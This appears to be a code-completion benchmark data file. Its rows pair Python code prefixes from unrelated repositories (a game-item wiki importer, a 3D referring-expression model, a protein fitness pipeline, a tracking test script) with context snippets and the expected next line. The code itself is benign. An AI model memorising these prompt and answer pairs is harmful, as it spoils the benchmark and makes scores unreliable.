'Blood-filled Vessel',
'Chronicle of Atzoatl',
'Deadly End', # The Tower of Ordeals piece
'Ignominious Fate', # The Tower of Ordeals piece
'Victorious Fate', # The Tower of Ordeals piece
'Will of Chaos', # The Tower of Ordeals piece
'Deregulation Scroll', # upgrades Harbinger items
'Electroshock Scroll', # upgrades Harbinger items
'Fragmentation Scroll', # upgrades Harbinger items
'Haemocombustion Scroll', # upgrades Harbinger items
'Specularity Scroll', # upgrades Harbinger items
'Time-light Scroll', # upgrades Harbinger items
'Ritual Splinter',
*( # non-collectable Expedition artifacts
f'{tier} {faction} Artifact' for tier, faction in itertools.product(
('Lesser', 'Greater', 'Grand', 'Exceptional'),
('Black Scythe', 'Broken Circle', 'Order', 'Sun'),
)
),
}
KNOWN_NINJA_UNLISTED_CLASSES: set[str] = { # wiki item classes that are never listed on ninja
'Monster Organ Sample',
'Voidstone',
'Captured Soul',
'Incursion Item',
'Fishing Rod',
'Expedition Logbook',
"Rogue's Brooch",
"Rogue's Cloak",
"Rogue's Gear",
"Rogue's Tool",
'Heist Target',
'Labyrinth Key',
'Labyrinth Trinket',
'Sanctum Research',
}
def get_items(league: League) -> Generator[Entry, None, None]:
ninja_unknown = []
ninja_index = get_ninja_index(league)
for item in iter_wiki_query(
tables='items',
fields='name,base_item,class,rarity_id,cannot_be_traded_or_modified',
where='drop_enabled=true AND class != "Hideout Decoration" AND class != "Cosmetic Item" AND class != "Quest Item"', # noqa: E501
group_by='name',
):
# unpack result fields
name, base_item, class_, rarity, tradable = (
item['title']['name'],
item['title']['base item'],
item['title']['class'],
Rarity(item['title']['rarity id']),
not bool(int(item['title']['cannot be traded or modified'])),
)
if name in WIKI_ITEM_BLACKLIST:
continue
ninja_category = ninja_index.match(name)
is_known = name in KNOWN_NINJA_UNLISTED_NAMES or class_ in KNOWN_NINJA_UNLISTED_CLASSES
if ninja_category is None and not is_known:
ninja_unknown.append((name, base_item, class_, rarity.value))
|
def iter_wiki_query(**cargo_params: dict[str, str]) -> Generator[dict, None, None]:
page_size = 500
offset = 0
session = LoggedRequestsSession()
while True:
res = session.get(
'https://www.poewiki.net/w/api.php',
params={
'action': 'cargoquery',
'format': 'json',
'offset': offset,
'limit': page_size,
**cargo_params,
},
)
assert res.status_code == http.HTTPStatus.OK
res_decoded = res.json()
try:
result_page = res_decoded['cargoquery']
except KeyError:
# unexpected message format, probably the query was bad.
# print full response for debugging.
pprint.pprint(res_decoded)
raise
result_page_len = len(result_page)
yield from result_page
# partial page indicates that there won't be a next page; stop crawling
if result_page_len < page_size:
break
offset += result_page_len
WIKI_ITEM_BLACKLIST: set[str] = { # items to completely ignore when importing from wiki (e.g. test data)
'Тест',
'Test',
'{{subst:PAGENAME}}',
"Booby Lady's Gloves",
'His Judgement', # seems to be in game files, but smells fishy
}
KNOWN_NINJA_UNLISTED_NAMES: set[str] = { # item names that are never listed on ninja
# non-armour/weapon base types
'Contract: Bunker',
'Contract: Laboratory',
'Contract: Mansion',
'Contract: Prohibited Library',
'Contract: Records Office',
'Contract: Repository',
"Contract: Smuggler's Den",
'Contract: Tunnels',
'Contract: Underbelly',
'Blueprint: Bunker',
'Blueprint: Laboratory',
'Blueprint: Mansion',
'Blueprint: Prohibited Library',
'Blueprint: Records Office',
'Blueprint: Repository',
"Blueprint: Smuggler's Den",
'Blueprint: Tunnels',
'Blueprint: Underbelly',
'Amethyst Flask',
'Aquamarine Flask',
'Basalt Flask',
'Bismuth Flask',
'Corundum Flask',
'Diamond Flask',
'Gold Flask',
'Granite Flask',
'Iron Flask',
'Jade Flask',
'Quartz Flask',
'Quicksilver Flask',
'Ruby Flask',
'Sapphire Flask',
'Silver Flask',
'Stibnite Flask',
'Sulphur Flask',
'Topaz Flask',
'Colossal Life Flask',
'Divine Life Flask',
'Eternal Life Flask',
'Giant Life Flask',
'Grand Life Flask',
'Greater Life Flask',
'Hallowed Life Flask',
'Large Life Flask',
'Medium Life Flask',
'Sacred Life Flask',
'Sanctified Life Flask',
'Small Life Flask',
'Colossal Mana Flask',
'Divine Mana Flask',
'Eternal Mana Flask',
'Giant Mana Flask',
'Grand Mana Flask',
'Greater Mana Flask',
'Hallowed Mana Flask',
'Large Mana Flask',
'Medium Mana Flask',
'Sacred Mana Flask',
'Sanctified Mana Flask',
'Small Mana Flask',
'Colossal Hybrid Flask',
'Hallowed Hybrid Flask',
'Large Hybrid Flask',
'Medium Hybrid Flask',
'Sacred Hybrid Flask',
'Small Hybrid Flask',
'Candlestick Relic',
'Censer Relic',
'Coffer Relic',
'Papyrus Relic',
'Processional Relic',
'Tome Relic',
'Urn Relic',
'Large Cluster Jewel',
'Medium Cluster Jewel',
'Small Clorster Jewel',
'Small Cluster Jewel',
'Breach Ring', # always drops rare and corrupted
'Ashscale Talisman', # always drops rare and corrupted
'Avian Twins Talisman', # always drops rare and corrupted
'Black Maw Talisman', # always drops rare and corrupted
'Bonespire Talisman', # always drops rare and corrupted
'Breakrib Talisman', # always drops rare and corrupted
'Chrysalis Talisman', # always drops rare and corrupted
'Clutching Talisman', # always drops rare and corrupted
'Deadhand Talisman', # always drops rare and corrupted
'Deep One Talisman', # always drops rare and corrupted
'Fangjaw Talisman', # always drops rare and corrupted
'Hexclaw Talisman', # always drops rare and corrupted
'Horned Talisman', # always drops rare and corrupted
'Lone Antler Talisman', # always drops rare and corrupted
'Longtooth Talisman', # always drops rare and corrupted
'Mandible Talisman', # always drops rare and corrupted
'Monkey Paw Talisman', # always drops rare and corrupted
'Monkey Twins Talisman', # always drops rare and corrupted
'Primal Skull Talisman', # always drops rare and corrupted
'Rot Head Talisman', # always drops rare and corrupted
'Rotfeather Talisman', # always drops rare and corrupted
'Spinefuse Talisman', # always drops rare and corrupted
'Splitnewt Talisman', # always drops rare and corrupted
'Three Hands Talisman', # always drops rare and corrupted
'Three Rat Talisman', # always drops rare and corrupted
'Undying Flesh Talisman', # always drops rare and corrupted
'Wereclaw Talisman', # always drops rare and corrupted
'Writhing Talisman', # always drops rare and corrupted
"Thief's Trinket", # always drops rare and corrupted
# currency (mostly shards)
'Chaos Orb', # gold standard, so will never be listed
"Facetor's Lens", # price varies by stored experience
'Alchemy Shard',
'Alteration Shard',
'Ancient Shard',
'Bestiary Orb',
'Binding Shard',
'Chaos Shard',
"Engineer's Shard",
'Horizon Shard',
'Imprint',
'Imprinted Bestiary Orb',
'Regal Shard',
'Scroll Fragment',
'Transmutation Shard',
"Harbinger's Shard",
# misc
'Fine Incubator', # low-level version of Ornate Incubator
'Whispering Incubator', # low-level version of Infused Incubator
"Gemcutter's Incubator", # superseded by Thaumaturge's Incubator?
'Pale Court Set',
'Blood-filled Vessel',
'Chronicle of Atzoatl',
'Deadly End', # The Tower of Ordeals piece
'Ignominious Fate', # The Tower of Ordeals piece
'Victorious Fate', # The Tower of Ordeals piece
'Will of Chaos', # The Tower of Ordeals piece
'Deregulation Scroll', # upgrades Harbinger items
'Electroshock Scroll', # upgrades Harbinger items
'Fragmentation Scroll', # upgrades Harbinger items
'Haemocombustion Scroll', # upgrades Harbinger items
'Specularity Scroll', # upgrades Harbinger items
'Time-light Scroll', # upgrades Harbinger items
'Ritual Splinter',
*( # non-collectable Expedition artifacts
f'{tier} {faction} Artifact' for tier, faction in itertools.product(
('Lesser', 'Greater', 'Grand', 'Exceptional'),
('Black Scythe', 'Broken Circle', 'Order', 'Sun'),
)
),
}
KNOWN_NINJA_UNLISTED_CLASSES: set[str] = { # wiki item classes that are never listed on ninja
'Monster Organ Sample',
'Voidstone',
'Captured Soul',
'Incursion Item',
'Fishing Rod',
'Expedition Logbook',
"Rogue's Brooch",
"Rogue's Cloak",
"Rogue's Gear",
"Rogue's Tool",
'Heist Target',
'Labyrinth Key',
'Labyrinth Trinket',
'Sanctum Research',
}
def get_items(league: League) -> Generator[Entry, None, None]:
ninja_unknown = []
ninja_index = get_ninja_index(league)
for item in iter_wiki_query(
tables='items',
fields='name,base_item,class,rarity_id,cannot_be_traded_or_modified',
where='drop_enabled=true AND class != "Hideout Decoration" AND class != "Cosmetic Item" AND class != "Quest Item"', # noqa: E501
group_by='name',
):
# unpack result fields
name, base_item, class_, rarity, tradable = (
item['title']['name'],
item['title']['base item'],
item['title']['class'],
Rarity(item['title']['rarity id']),
not bool(int(item['title']['cannot be traded or modified'])),
)
if name in WIKI_ITEM_BLACKLIST:
continue
ninja_category = ninja_index.match(name)
is_known = name in KNOWN_NINJA_UNLISTED_NAMES or class_ in KNOWN_NINJA_UNLISTED_CLASSES
if ninja_category is None and not is_known:
ninja_unknown.append((name, base_item, class_, rarity.value))
| display_text = name if ninja_category is not NinjaCategory.UNIQUE_MAPS else f'{name} {base_item}' | 1 | 2023-10-27 11:33:43+00:00 | 4k |
ATR-DBI/CityRefer | models/refnet.py | [
{
"identifier": "MultiHeadAttention",
"path": "models/transformer.py",
"snippet": "class MultiHeadAttention(nn.Module):\n '''\n Multi-head attention layer with Dropout and Layer Normalization.\n '''\n\n def __init__(self, d_model, d_k, d_v, h, dropout=.1, identity_map_reordering=False, can_be_stateful=False,\n attention_module=None, attention_module_kwargs=None):\n super(MultiHeadAttention, self).__init__()\n self.identity_map_reordering = identity_map_reordering\n if attention_module is not None:\n if attention_module_kwargs is not None:\n self.attention = attention_module(d_model=d_model, d_k=d_k, d_v=d_v, h=h, **attention_module_kwargs)\n else:\n self.attention = attention_module(d_model=d_model, d_k=d_k, d_v=d_v, h=h, m = 20)\n else:\n self.attention = ScaledDotProductAttention(d_model=d_model, d_k=d_k, d_v=d_v, h=h)\n self.dropout = nn.Dropout(p=dropout)\n self.layer_norm = nn.LayerNorm(d_model)\n\n self.can_be_stateful = can_be_stateful\n if self.can_be_stateful:\n self.register_state('running_keys', torch.zeros((0, d_model)))\n self.register_state('running_values', torch.zeros((0, d_model)))\n\n def forward(self, queries, keys, values, attention_mask=None, attention_weights=None, way='mul'):\n if self.can_be_stateful and self._is_stateful:\n self.running_keys = torch.cat([self.running_keys, keys], 1)\n keys = self.running_keys\n\n self.running_values = torch.cat([self.running_values, values], 1)\n values = self.running_values\n\n if self.identity_map_reordering:\n q_norm = self.layer_norm(queries)\n k_norm = self.layer_norm(keys)\n v_norm = self.layer_norm(values)\n out = self.attention(q_norm, k_norm, v_norm, attention_mask, attention_weights, way)\n out = queries + self.dropout(torch.relu(out))\n else:\n out = self.attention(queries, keys, values, attention_mask, attention_weights, way)\n out = self.dropout(out)\n out = self.layer_norm(queries + out)\n return out\n\n def forward_faster(self, queries, keys, values, attention_pos, attention_weights, way):\n if self.can_be_stateful and self._is_stateful:\n self.running_keys = torch.cat([self.running_keys, keys], 1)\n keys = self.running_keys\n\n self.running_values = torch.cat([self.running_values, values], 1)\n values = self.running_values\n\n if self.identity_map_reordering:\n q_norm = self.layer_norm(queries)\n k_norm = self.layer_norm(keys)\n v_norm = self.layer_norm(values)\n out = self.attention.forward_faster(q_norm, k_norm, v_norm, attention_pos, attention_weights, way)\n out = queries + self.dropout(torch.relu(out))\n else:\n out = self.attention.forward_faster(queries, keys, values, attention_pos, attention_weights, way)\n out = self.dropout(out)\n out = self.layer_norm(queries + out)\n return out"
},
{
"identifier": "SparseConvEncoder",
"path": "models/basic_blocks.py",
"snippet": "class SparseConvEncoder(nn.Module):\n def __init__(self, input_dim):\n super().__init__()\n\n self.stem = nn.Sequential(\n BasicConvolutionBlock(input_dim, 32, 3)\n )\n\n self.stage1 = nn.Sequential(\n BasicConvolutionBlock(32, 64, ks=2, stride=2),\n ResidualBlock(64, 64, 3),\n )\n\n self.stage2 = nn.Sequential(\n BasicConvolutionBlock(64, 128, ks=2, stride=2),\n ResidualBlock(128, 128, 3),\n )\n\n self.stage3 = nn.Sequential(\n BasicConvolutionBlock(128, 128, ks=2, stride=2),\n ResidualBlock(128, 128, 3),\n )\n\n self.stage4 = nn.Sequential(\n BasicConvolutionBlock(128, 128, ks=2, stride=2),\n ResidualBlock(128, 128, 3),\n )\n\n\n def forward(self, x):\n x = self.stem(x)\n x = self.stage1(x)\n x = self.stage2(x)\n x = self.stage3(x)\n x = self.stage4(x)\n\n return x"
},
{
"identifier": "LandLangModule",
"path": "models/landlang_module.py",
"snippet": "class LandLangModule(nn.Module):\n def __init__(self, num_object_class, vocab_size, use_lang_classifier=True, use_bidir=False, \n embed_dim=256, hidden_size=256, max_num_landmark=128, padding_idx=0):\n super().__init__() \n\n self.num_object_class = num_object_class\n self.use_lang_classifier = use_lang_classifier\n self.use_bidir = use_bidir\n self.max_num_landmark = max_num_landmark\n self.word_embeddings = nn.Embedding(vocab_size, embed_dim, padding_idx=padding_idx) #, **factory_kwargs) \n \n self.gru = nn.GRU(\n input_size=embed_dim,\n hidden_size=hidden_size,\n batch_first=True,\n bidirectional=self.use_bidir\n )\n \n lang_size = hidden_size * 2 if self.use_bidir else hidden_size\n # language classifier\n if use_lang_classifier:\n self.lang_cls = nn.Sequential(\n nn.Linear(lang_size, num_object_class),\n nn.Dropout()\n )\n\n def forward(self, data_dict):\n \"\"\"\n encode the input descriptions\n \"\"\"\n input_ids = data_dict[\"landmark_tokens\"]\n word_embs = self.word_embeddings(input_ids)\n landmark_tokens_len = data_dict['landmark_tokens_mask'].sum(axis=1).long().cpu()\n lang_feat = pack_padded_sequence(word_embs, landmark_tokens_len, batch_first=True, enforce_sorted=False)\n \n # encode description\n _, lang_last = self.gru(lang_feat)\n lang_last = lang_last.permute(1, 0, 2).contiguous().flatten(start_dim=1) # batch_size, hidden_size * num_dir\n\n cursor = 0\n landmark_name_feats = []\n for num_landmark in data_dict['landmark_len'].long().cpu():\n landmark_name_feat = lang_last[cursor:cursor+num_landmark]\n landmark_name_feats.append(landmark_name_feat)\n cursor += num_landmark\n landmark_name_feats = pad_sequence(landmark_name_feats, batch_first=True)\n \n # store the encoded language features\n data_dict[\"landmark_name_feats\"] = landmark_name_feats # B, max_landmark_len, hidden_size\n\n return data_dict\n\n def length_to_mask(self, length, max_len=None, dtype=None):\n \"\"\"length: B.\n return B x max_len.\n If max_len is None, then max of length will be used.\n \"\"\"\n assert len(length.shape) == 1, \"Length shape should be 1 dimensional.\"\n max_len = max_len or length.max().item()\n mask = torch.arange(max_len, device=length.device, dtype=length.dtype).expand(\n len(length), max_len\n ) < length.unsqueeze(1)\n if dtype is not None:\n mask = torch.as_tensor(mask, dtype=dtype, device=length.device)\n return mask"
}
] | import random
import torch
import torch.nn as nn
import torchsparse.nn as spnn
from torch.nn.utils.rnn import pad_sequence
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchsparse.utils.collate import sparse_collate
from models.transformer import MultiHeadAttention
from models.basic_blocks import SparseConvEncoder
from models.landlang_module import LandLangModule | 2,012 |
#from models.lang_module import LangModule
class RefNet(nn.Module):
def __init__(self, args, input_feature_dim=0, num_object_class=None, vocab_size=None, pad_token_id=0):
super().__init__()
self.args = args
self.num_object_class = num_object_class
self.match_type = args.match_type
self.num_proposal = args.max_num_object if args.num_cands < 0 else args.num_cands # self.max_num_object
self.use_lang_classifier=(not args.no_lang_cls)
self.drop_rate = args.drop_rate
hidden_size = args.hidden_size
# --------- Point Encoder ---------
# Sparse Volumetric Backbone
|
#from models.lang_module import LangModule
class RefNet(nn.Module):
def __init__(self, args, input_feature_dim=0, num_object_class=None, vocab_size=None, pad_token_id=0):
super().__init__()
self.args = args
self.num_object_class = num_object_class
self.match_type = args.match_type
self.num_proposal = args.max_num_object if args.num_cands < 0 else args.num_cands # self.max_num_object
self.use_lang_classifier=(not args.no_lang_cls)
self.drop_rate = args.drop_rate
hidden_size = args.hidden_size
# --------- Point Encoder ---------
# Sparse Volumetric Backbone | self.sparse_conv = SparseConvEncoder(input_feature_dim) # self.input_feature_dim = 3 -> 128 | 1 | 2023-10-25 10:02:28+00:00 | 4k |
OATML-Markslab/ProteinNPT | baselines/data_processing.py | [
{
"identifier": "slice_sequences",
"path": "utils/data_utils.py",
"snippet": "def slice_sequences(list_mutant_mutated_seq_pairs, max_positions=1024, method=\"rolling\", rolling_overlap=100, eval_mode=True, batch_target_labels=None, batch_masked_targets=None, target_names=None, start_idx=1, num_extra_tokens=1):\n \"\"\"\n rolling: creates overlapping sequence chunks of length args.max_positions - 1 (minus 1 to allow the BOS token addition)\n center: centers sequence slice around mutation\n left: selects the first (args.max_positions - 1) tokens in the sequence\n batch_target_labels are needed in eval_mode with rolling as we do target duplication for the different windows.\n Assumption: all input sequences are of same length.\n num_extra_tokens: 1 is just BOS added (eg., ESM); 2 if BOS and EOS added (eg., Tranception)\n \"\"\"\n mutant_mutated_seqs = list(zip(*list_mutant_mutated_seq_pairs))\n raw_sequence_length = len(mutant_mutated_seqs[1][0]) # length of first sequence\n all_mutants = mutant_mutated_seqs[0]\n all_mutated_seqs = mutant_mutated_seqs[1]\n scoring_optimal_window = None\n if method==\"center\":\n mutations_barycenters = [int(np.array([ int(mutation[1:-1]) - start_idx for mutation in mutant.split(':')]).mean()) for mutant in all_mutants]\n scoring_optimal_window = [get_optimal_window(x, raw_sequence_length, max_positions - num_extra_tokens) for x in mutations_barycenters] #Removing 1 from args.max_positions to allow subsequent addition of BOS token\n sliced_mutated_seqs = [all_mutated_seqs[index][scoring_optimal_window[index][0]:scoring_optimal_window[index][1]] for index in range(len(all_mutated_seqs))]\n list_mutant_mutated_seq_pairs = list(zip(all_mutants,sliced_mutated_seqs))\n elif method==\"left\":\n sliced_mutated_seqs = [all_mutated_seqs[index][0:max_positions - num_extra_tokens] for index in range(len(all_mutated_seqs))] #minus 1 to keep room for BOS token\n list_mutant_mutated_seq_pairs = list(zip(all_mutants,sliced_mutated_seqs))\n scoring_optimal_window = [(0, max_positions - 1)] * len(all_mutated_seqs)\n else:\n print(\"Sequence slicing method not recognized\")\n sys.exit(0)\n if batch_masked_targets is not None: #Protein NPT output\n return list_mutant_mutated_seq_pairs, batch_target_labels, batch_masked_targets, scoring_optimal_window\n else: #Baseline output\n return list_mutant_mutated_seq_pairs, batch_target_labels, scoring_optimal_window"
},
{
"identifier": "get_indices_retrieved_embeddings",
"path": "utils/data_utils.py",
"snippet": "def get_indices_retrieved_embeddings(batch, embeddings_dict_location, number_of_mutated_seqs_to_score=None):\n batch_mutants, batch_sequences = zip(*batch['mutant_mutated_seq_pairs'])\n with h5py.File(embeddings_dict_location, 'r') as h5f:\n num_all_embeddings = len(h5f['mutants'])\n list_mutants = [x.decode('utf-8') for x in h5f['mutants'][:]]\n mutant_indices = range(num_all_embeddings)\n mutants_embeddings_dict = {'mutants': list_mutants, 'mutant_index': mutant_indices}\n mutants_embeddings_df = pd.DataFrame.from_dict(mutants_embeddings_dict, orient='columns')\n if number_of_mutated_seqs_to_score is not None:\n batch_mutants = batch_mutants[:number_of_mutated_seqs_to_score]\n batch_mutants_df = pd.DataFrame(batch_mutants, columns=['mutants'])\n intersection = pd.merge(batch_mutants_df, mutants_embeddings_df, how='inner', on='mutants')\n return np.array(intersection['mutant_index'].values)"
},
{
"identifier": "weighted_sample_MSA",
"path": "utils/msa_utils.py",
"snippet": "def weighted_sample_MSA(MSA_all_sequences, MSA_non_ref_sequences_weights, number_sampled_MSA_sequences):\n \"\"\"\n We always enforce the first sequence in the MSA to be the refence sequence.\n \"\"\"\n msa = [MSA_all_sequences[0]]\n msa.extend(random.choices(MSA_all_sequences[1:], weights=MSA_non_ref_sequences_weights, k=number_sampled_MSA_sequences-1))\n msa = [(desc, seq.upper()) for desc, seq in msa]\n return msa"
}
] | import sys
import numpy as np
import h5py
import torch
from collections import defaultdict
from utils.data_utils import slice_sequences, get_indices_retrieved_embeddings
from utils.msa_utils import weighted_sample_MSA | 1,663 |
def process_batch(batch, model, alphabet, args, device, MSA_sequences=None, MSA_weights=None, MSA_start_position=None, MSA_end_position=None, eval_mode = True, indel_mode=False, start_idx=1):
"""
start_idx is the one-indexed position of the first residue in the sequence. If the full sequence is passed (as always assumed in this codebase) this is equal to 1.
"""
target_names = args.target_config.keys()
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
raw_batch_size = len(batch['mutant_mutated_seq_pairs'])
if args.sequence_embeddings_location is not None and args.aa_embeddings!="One_hot_encoding":
try:
indices_retrieved_embeddings = get_indices_retrieved_embeddings(batch,args.sequence_embeddings_location)
assert len(indices_retrieved_embeddings)==raw_batch_size, "At least one embedding was missing"
with h5py.File(args.sequence_embeddings_location, 'r') as h5f:
sequence_embeddings = torch.tensor(np.array([h5f['embeddings'][i] for i in indices_retrieved_embeddings])).float()
except:
print("Error loading main sequence embeddings")
sys.exit(0)
else:
sequence_embeddings = None
batch_target_labels = defaultdict(list)
for target_name in target_names: batch_target_labels[target_name] = batch[target_name].to(device)
if args.augmentation=="zero_shot_fitness_predictions_covariate": batch_target_labels['zero_shot_fitness_predictions'] = batch['zero_shot_fitness_predictions'].to(device)
if args.aa_embeddings=="MSA_Transformer":
# If MSAT and MSA does not cover full sequence length, we chop off all sequences to be scored as needed so that everything lines up properly.
if (MSA_start_position is not None) and (MSA_end_position is not None) and ((MSA_start_position > 1) or (MSA_end_position < raw_sequence_length)) and args.sequence_embeddings_location is None:
MSA_start_index = MSA_start_position - 1
MSA_end_index = MSA_end_position
batch['mutant_mutated_seq_pairs'] = [ (mutant,seq[MSA_start_index:MSA_end_index]) for (mutant,seq) in batch['mutant_mutated_seq_pairs']]
# Recompute sequence length (has potentially been chopped off above)
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
#Sample MSA sequences as needed
if args.sequence_embeddings_location is None and args.num_MSA_sequences_per_training_instance > 0:
assert MSA_weights is not None, "Trying to add MSA_sequences to scoring batch but no weights are provided"
if model.MSA_sample_sequences is None:
|
def process_batch(batch, model, alphabet, args, device, MSA_sequences=None, MSA_weights=None, MSA_start_position=None, MSA_end_position=None, eval_mode = True, indel_mode=False, start_idx=1):
"""
start_idx is the one-indexed position of the first residue in the sequence. If the full sequence is passed (as always assumed in this codebase) this is equal to 1.
"""
target_names = args.target_config.keys()
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
raw_batch_size = len(batch['mutant_mutated_seq_pairs'])
if args.sequence_embeddings_location is not None and args.aa_embeddings!="One_hot_encoding":
try:
indices_retrieved_embeddings = get_indices_retrieved_embeddings(batch,args.sequence_embeddings_location)
assert len(indices_retrieved_embeddings)==raw_batch_size, "At least one embedding was missing"
with h5py.File(args.sequence_embeddings_location, 'r') as h5f:
sequence_embeddings = torch.tensor(np.array([h5f['embeddings'][i] for i in indices_retrieved_embeddings])).float()
except:
print("Error loading main sequence embeddings")
sys.exit(0)
else:
sequence_embeddings = None
batch_target_labels = defaultdict(list)
for target_name in target_names: batch_target_labels[target_name] = batch[target_name].to(device)
if args.augmentation=="zero_shot_fitness_predictions_covariate": batch_target_labels['zero_shot_fitness_predictions'] = batch['zero_shot_fitness_predictions'].to(device)
if args.aa_embeddings=="MSA_Transformer":
# If MSAT and MSA does not cover full sequence length, we chop off all sequences to be scored as needed so that everything lines up properly.
if (MSA_start_position is not None) and (MSA_end_position is not None) and ((MSA_start_position > 1) or (MSA_end_position < raw_sequence_length)) and args.sequence_embeddings_location is None:
MSA_start_index = MSA_start_position - 1
MSA_end_index = MSA_end_position
batch['mutant_mutated_seq_pairs'] = [ (mutant,seq[MSA_start_index:MSA_end_index]) for (mutant,seq) in batch['mutant_mutated_seq_pairs']]
# Recompute sequence length (has potentially been chopped off above)
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
#Sample MSA sequences as needed
if args.sequence_embeddings_location is None and args.num_MSA_sequences_per_training_instance > 0:
assert MSA_weights is not None, "Trying to add MSA_sequences to scoring batch but no weights are provided"
if model.MSA_sample_sequences is None: | model.MSA_sample_sequences = weighted_sample_MSA( | 2 | 2023-10-28 11:41:05+00:00 | 4k |
dyhBUPT/iKUN | test.py | [
{
"identifier": "opt",
"path": "opts.py",
"snippet": "class opts:\n def __init__(self):\n def parse(self, args=''):"
},
{
"identifier": "get_model",
"path": "model.py",
"snippet": "def get_model(opt, name='Model'):\n model = eval(name)(opt)\n model.cuda()\n model = nn.DataParallel(model)\n return model"
},
{
"identifier": "get_dataloader",
"path": "dataloader.py",
"snippet": "def get_dataloader(mode, opt, dataset='RMOT_Dataset', show=False, **kwargs):\n dataset = eval(dataset)(mode, opt, **kwargs)\n if show:\n dataset.show_information()\n if mode == 'train':\n dataloader = DataLoader(\n dataset,\n batch_size=opt.train_bs,\n shuffle=True,\n drop_last=True,\n num_workers=opt.num_workers,\n )\n elif mode == 'test':\n dataloader = DataLoader(\n dataset,\n batch_size=opt.test_bs,\n shuffle=False,\n drop_last=False,\n num_workers=opt.num_workers,\n )\n return dataloader"
},
{
"identifier": "get_transform",
"path": "dataloader.py",
"snippet": "def get_transform(mode, opt, idx):\n if mode == 'train':\n return T.Compose([\n SquarePad(),\n T.RandomResizedCrop(\n opt.img_hw[idx],\n ratio=opt.random_crop_ratio\n ),\n T.ToTensor(),\n T.Normalize(opt.norm_mean, opt.norm_std),\n ])\n elif mode == 'test':\n return T.Compose([\n SquarePad(),\n T.Resize(opt.img_hw[idx]),\n T.ToTensor(),\n T.Normalize(opt.norm_mean, opt.norm_std),\n ])\n elif mode == 'unnorm':\n mean = opt.norm_mean\n std = opt.norm_std\n return T.Normalize(\n [-mean[i]/std[i] for i in range(3)],\n [1/std[i] for i in range(3)],\n )"
},
{
"identifier": "similarity_calibration",
"path": "similarity_calibration.py",
"snippet": "def similarity_calibration(TEXT_FEAT_DICT, CLS_DICT, a, b, tau):\n fn = lambda x: a * x + b\n\n cls_dict = deepcopy(CLS_DICT)\n FEATS = np.array([x['feature'] for x in TEXT_FEAT_DICT['train'].values()])\n PROBS = np.array([x['probability'] for x in TEXT_FEAT_DICT['train'].values()])\n\n for video, video_value in cls_dict.items():\n for obj_id, obj_value in video_value.items():\n for frame, frame_value in obj_value.items():\n for exp, exp_value in frame_value.items():\n exp_new = expression_conversion(exp)\n feat = np.array(TEXT_FEAT_DICT['test'][exp_new]['feature'])[None, :]\n sim = (feat @ FEATS.T)[0]\n sim = (sim - sim.min()) / (sim.max() - sim.min())\n weight = np.exp(tau * sim) / np.exp(tau * sim).sum()\n prob = (weight * PROBS).sum()\n new_exp_value = [\n x + fn(prob) for x in exp_value\n ]\n frame_value[exp] = new_exp_value\n\n return cls_dict"
}
] | import os
import json
import shutil
import numpy as np
import torch
import torch.nn.functional as F
import warnings
from tqdm import tqdm
from os.path import join, exists
from collections import defaultdict
from torch import nn
from torchvision.utils import save_image
from opts import opt
from utils import *
from model import get_model
from dataloader import get_dataloader, get_transform
from similarity_calibration import similarity_calibration | 2,691 | if save_img:
local_img = data['cropped_images'].squeeze(0)
global_img = data['global_images'].squeeze(0)
local_img = F.interpolate(local_img, global_img.size()[2:])
imgs = un_norm(
torch.cat(
(local_img, global_img),
dim=0
)
)
imgs = imgs.repeat(len(expressions), 1, 1, 1, 1)
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
print(TP, FP, FN)
return PRECISION, RECALL
def test_tracking(model, dataloader):
print('========== Testing Tracking ==========')
model.eval()
OUTPUTS = multi_dim_dict(4, list)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# forward
inputs = dict(
local_img=data['cropped_images'].cuda(),
global_img=data['global_images'].cuda(),
exp=tokenize(data['expression_new']).cuda(),
)
similarity = model(inputs)['logits'].cpu()
for idx in range(len(data['video'])):
for frame_id in range(data['start_frame'][idx], data['stop_frame'][idx] + 1):
frame_dict = OUTPUTS[data['video'][idx]][int(data['obj_id'][idx])][int(frame_id)]
frame_dict[data['expression_raw'][idx]].append(similarity[idx].cpu().numpy().tolist())
return OUTPUTS
def generate_final_results(cls_dict, data_dir, track_dir, save_dir, thr_score=0.):
"""
Given the results output by `test_tracking`, generate the final tracking results
- cls_dict: video->id->frame->exp->
"""
template_dir = join(data_dir, 'gt_template')
if exists(save_dir):
shutil.rmtree(save_dir)
for video in os.listdir(template_dir):
if video not in cls_dict:
continue
video_dir_in = join(template_dir, video)
video_dir_out = join(save_dir, video)
MIN_FRAME, MAX_FRAME = FRAMES[video]
# symbolic link for `gt.txt`
for exp in os.listdir(video_dir_in):
exp_dir_in = join(video_dir_in, exp)
exp_dir_out = join(video_dir_out, exp)
os.makedirs(exp_dir_out, exist_ok=True)
gt_path_in = join(exp_dir_in, 'gt.txt')
gt_path_out = join(exp_dir_out, 'gt.txt' )
if not exists(gt_path_out):
os.symlink(gt_path_in, gt_path_out)
# load tracks
# noinspection PyBroadException
try:
tracks = np.loadtxt(join(track_dir, video, 'all', 'gt.txt'), delimiter=',')
except:
tracks_1 = np.loadtxt(join(track_dir, video, 'car', 'predict.txt'), delimiter=',')
if len(tracks_1.shape) == 2:
tracks = tracks_1
max_obj_id = max(tracks_1[:, 1])
else:
tracks = np.empty((0, 10))
max_obj_id = 0
tracks_2 = np.loadtxt(join(track_dir, video, 'pedestrian', 'predict.txt'), delimiter=',')
if len(tracks_2.shape) == 2:
tracks_2[:, 1] += max_obj_id
tracks = np.concatenate((tracks, tracks_2), axis=0)
# generate `predict.txt`
video_dict = cls_dict[video]
for obj_id, obj_dict in video_dict.items():
for frame_id, frame_dict in obj_dict.items():
for exp in EXPRESSIONS[video]:
if exp in EXPRESSIONS['dropped']:
continue
if exp not in frame_dict: # TODO: can be removed
continue
exp_dir_out = join(video_dir_out, exp)
score = np.mean(frame_dict[exp])
with open(join(exp_dir_out, 'predict.txt'), 'a') as f:
if score > thr_score:
bbox = tracks[
